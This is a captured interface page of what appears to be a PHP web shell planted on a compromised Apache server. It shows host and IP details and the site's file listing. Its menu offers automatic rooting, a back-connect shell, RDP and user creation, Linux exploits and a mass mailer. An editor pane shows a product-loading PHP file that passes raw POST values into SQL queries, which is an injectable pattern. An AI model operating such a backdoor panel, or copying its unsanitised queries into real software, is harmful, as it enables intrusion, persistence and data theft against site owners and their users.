Linux ip-172-26-5-244 6.1.0-28-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.119-1 (2024-11-22) x86_64
Apache
: 172.26.5.244 | : 216.73.216.21
Cant Read [ /etc/named.conf ]
8.3.14
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
opt /
bitnami /
apache /
htdocs /
[ HOME SHELL ]
Name
Size
Permission
Action
PHPMailer
[ DIR ]
drwxr-xr-x
admin
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
php
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
uploads
[ DIR ]
drwxrwxrwx
vendor
[ DIR ]
drwxr-xr-x
videos
[ DIR ]
drwxr-xr-x
.htaccess
844
B
-rw-r--r--
-----index.html
4.76
KB
-rw-rw-r--
---catalogue.php
74.37
KB
-rw-r--r--
360.php
15.2
KB
-rw-r--r--
73766.jpg
997.9
KB
-rw-r--r--
Cart.class.php
6.98
KB
-rw-r--r--
about-us.php
32.79
KB
-rw-r--r--
add_cart.php
325
B
-rw-r--r--
aj_get_color_test2.php
29.86
KB
-rw-r--r--
aj_get_finish_test2.php
29.31
KB
-rw-r--r--
aj_get_size_test.php
32.16
KB
-rw-r--r--
aj_more_post.php
9.05
KB
-rw-r--r--
aj_more_post_finish.php
8.56
KB
-rw-r--r--
annual-retuns.php
11.32
KB
-rw-r--r--
blog-post.php
13.56
KB
-rw-r--r--
blog.php
6.47
KB
-rw-r--r--
builder.php
36.27
KB
-rw-r--r--
career.php
26.97
KB
-rw-r--r--
cart.php
6.65
KB
-rw-r--r--
catalogue.php
81.01
KB
-rw-r--r--
certifications.php
43.86
KB
-rw-r--r--
clear_cart.php
142
B
-rw-r--r--
composer.json
70
B
-rw-r--r--
composer.lock
15.78
KB
-rw-r--r--
csr.php
33.49
KB
-rw-r--r--
dealer-1.php
27.75
KB
-rw-r--r--
dealer.php
84.36
KB
-rw-r--r--
dealerbkp.php
55.94
KB
-rw-r--r--
delete_item.php
394
B
-rw-r--r--
design_by_italy.php
14.43
KB
-rw-r--r--
event_details.php
6.45
KB
-rw-r--r--
fetch_collection.php
846
B
-rw-r--r--
fetch_finish.php
904
B
-rw-r--r--
fetch_sizes.php
906
B
-rw-r--r--
fetch_surfaces.php
812
B
-rw-r--r--
fpdf.css
1.31
KB
-rw-r--r--
fpdf.php
49.65
KB
-rw-r--r--
generate_pdf.php
2.78
KB
-rw-r--r--
global-export.php
101.88
KB
-rw-r--r--
global-market-1.php
17.76
KB
-rw-r--r--
id-mapping.json
16.73
KB
-rw-r--r--
index.php
129.78
KB
-rw-r--r--
interior-architecture-2.php
59
KB
-rw-r--r--
interior-architecture.php
67.44
KB
-rw-r--r--
landing_page.html
9.74
KB
-rw-r--r--
located-us.php
34.96
KB
-rw-r--r--
manufacturer-and-supplier.php
73.38
KB
-rw-r--r--
milestones.php
15.72
KB
-rw-r--r--
news-play.php
6.62
KB
-rw-r--r--
product-detail-2.php
41.38
KB
-rw-r--r--
product-detail.php
38.5
KB
-rw-r--r--
product-list-back.php
33.34
KB
-rw-r--r--
product-list.php
37.42
KB
-rw-r--r--
product-search.php
28.81
KB
-rw-r--r--
promoter-profile.php
8.8
KB
-rw-r--r--
robots.txt
99
B
-rw-r--r--
save_cart.php
269
B
-rw-r--r--
search_result_all.php
8.51
KB
-rw-r--r--
search_result_application.php
6.78
KB
-rw-r--r--
search_result_color.php
8.93
KB
-rw-r--r--
search_result_finish.php
8.87
KB
-rw-r--r--
search_result_size.php
7.24
KB
-rw-r--r--
server-smtp.php
3.3
KB
-rw-r--r--
server.php
1.19
KB
-rw-r--r--
showroom.php
2.19
KB
-rw-r--r--
sitemap.xml
60.69
KB
-rw-r--r--
tiles-calculator.php
25.23
KB
-rw-r--r--
view_cart.php
3.17
KB
-rw-r--r--
volume.php
47.04
KB
-rw-r--r--
volume_bkp.php
35.94
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : aj_more_post_finish.php
<?php include('admin/module/obops.php'); if(isset($_POST["prod_id"])){ //include database config $queryAll = mysqli_query($conn, "SELECT COUNT(*) as num_rows FROM tbl_new_products WHERE finish_id = '".$_POST['fid']."' LIMIT 20"); $row1 = mysqli_fetch_assoc($queryAll); // echo "SELECT COUNT(*) as num_rows FROM tbl_new_products WHERE finish_id = '".$_POST['fid']."'"; // exit; //count all rows except already displayed $allRows = $row1['num_rows']; // echo '<br>'; // echo 'All->'.$allRows; $showLimit = 20 ; // echo 'Limit->'.$showLimit; //get rows query $queryfetch = mysqli_query($conn, "SELECT * FROM tbl_new_products WHERE finish_id = '".$_POST['fid']."' AND prod_id > ".$_POST['prod_id']." ORDER BY prod_id ASC LIMIT ".$showLimit); // echo '<br>'; // echo "SELECT * FROM tbl_new_products WHERE finish_id = '".$_POST['fid']."' and prod_id > ".$_POST['prod_id']." group by old_series_id ORDER BY prod_id DESC LIMIT ".$showLimit; $numRows = mysqli_num_rows($queryfetch); if($numRows > 0) { while($prod = mysqli_fetch_assoc($queryfetch)) { $sel_coll="SELECT * from tbl_collection where `collection_id` = '".$prod['collection_id']."'"; $collname = mysqli_query($conn,$sel_coll); $coll = mysqli_fetch_assoc($collname); $sel_size="SELECT * from tbl_collection where `collection_id` = '".$prod['size_id']."'"; $sizename = mysqli_query($conn,$sel_size); $size = mysqli_fetch_assoc($sizename); $prod_id = $prod["prod_id"]; ?> <article class="qodef-e qodef-grid-item qodef-item--full post-912 portfolio-item type-portfolio-item status-publish has-post-thumbnail hentry portfolio-category-landscaping portfolio-tag-conceptual portfolio-tag-exhibition"> <div class="qodef-e-inner"> <div class="qodef-e-image"> <div class="qodef-e-media-image"> <a itemprop="url" href="product-detail-2.php?pid=<?= $prod['prod_id']; ?>&series=<?= $prod['old_series_id']; ?>&name=<?= $prod['prod_title']; ?>" target="_self"> <?php if (isset($_GET['application'])) { ?> <img fetchpriority="high" decoding="async" width="1100" height="728" src="uploads/products/<?= $prod['prod_image']; ?>" class="attachment-full size-full wp-post-image" alt="z" srcset="uploads/products/<?= $prod['prod_image']; ?>" sizes="(max-width: 1100px) 100vw, 1100px" /> <?php } else { ?> <img fetchpriority="high" decoding="async" width="1100" height="728" src="uploads/products/<?= $prod['prod_image2']; ?>" class="attachment-full size-full wp-post-image" alt="z" srcset="uploads/products/<?= $prod['prod_image2']; ?>" sizes="(max-width: 1100px) 100vw, 1100px" /> <?php } ?> </a> </div> </div> <?php if($prod['prod_image'] != ''){ ?> <div class="qodef-e-image-hover"> <div class="qodef-e-media-image-hover"> <a itemprop="url" href="product-detail-2.php?pid=<?= $prod['prod_id']; ?>&series=<?= $prod['old_series_id']; ?>&name=<?= $prod['prod_title']; ?>" target="_self"> <img decoding="async" width="1100" height="728" src="uploads/products/<?= $prod['prod_image']; ?>" class="attachment-full size-full" alt="z" srcset="uploads/products/<?= $prod['prod_image']; ?>" sizes="(max-width: 1100px) 100vw, 1100px" /> </a> </div> </div> <?php } else { ?> <div class="qodef-e-image-hover"> <div class="qodef-e-media-image-hover"> <a itemprop="url" href="product-detail-2.php?pid=<?= $prod['prod_id']; ?>&series=<?= $prod['old_series_id']; ?>&name=<?= $prod['prod_title']; ?>" target="_self"> <img decoding="async" width="1100" height="728" src="uploads/products/<?= $prod['prod_image2']; ?>" class="attachment-full size-full" alt="z" srcset="uploads/products/<?= $prod['prod_image2']; ?>" sizes="(max-width: 1100px) 100vw, 1100px" /> </a> </div> </div> <?php } ?> <div class="qodef-e-content" style="margin:24px 0 30px 0px"> <div class="qodef-e-text"> <h5 itemprop="name" class="qodef-e-title entry-title"> <a itemprop="url" class="qodef-e-title-link" href="product-detail-2.php?pid=<?= $prod['prod_id']; ?>&series=<?= $prod['old_series_id']; ?>&name=<?= $prod['prod_title']; ?>" target="_self"> <?= $prod['prod_name']; ?> </a> </h5> </div> <div class="qodef-e-top-holder"> <div class="qodef-e-info"> <?php $sql_s = "SELECT count(DISTINCT size_id) as amount_sum from tbl_new_products WHERE old_series_id = '".$prod['old_series_id']."'"; $cress = mysqli_query($conn,$sql_s); $sdata = mysqli_fetch_array($cress); ?> <a href="#" rel="tag"><?= $sdata["amount_sum"];?> sizes </a> <span class="qodef-info-separator-single"></span> <?php $sql_f = "SELECT count(DISTINCT finish_id) as amount_sum from tbl_new_products WHERE old_series_id = '".$prod['old_series_id']."' "; $cref = mysqli_query($conn,$sql_f); $fdata = mysqli_fetch_array($cref); ?> <a href="#" rel="tag"><?= $fdata["amount_sum"];?> finishes</a> <span class="qodef-info-separator-single"></span> <?php $sql = "SELECT count(DISTINCT color) as amount_sum from tbl_new_products WHERE old_series_id = '".$prod['old_series_id']."'"; $cres = mysqli_query($conn,$sql); $cdata = mysqli_fetch_array($cres); ?> <a href="#" rel="tag"><?= $cdata["amount_sum"];?> Colors</a> <div class="qodef-info-separator-end"></div> </div> </div> </div> </div> <input type="hidden" name="c_id" id="c_id" value="<?= $prod['size_id']; ?>"> <input type="hidden" name="s_id" id="s_id" value="<?= $prod['size_id']; ?>"> </article> <?php } ?> <?php if($allRows > $showLimit){ ?> <div class="text-center show_more_container" id="show_more_container<?php echo $prod_id; ?>"> <a class="tp-btn-black hover-2 theme-bg"> <span class="f_show_more" id="<?php echo $prod_id; ?>"> <button type="button" id="submit" class="qodef-shortcode qodef-m qodef-button qodef-layout--outlined qodef-html--link">Load More</button> </span> </a> </div> <?php } else { ?> <h4>No more products</h4> <?php } ?> <?php } ?> <?php } ?>
Close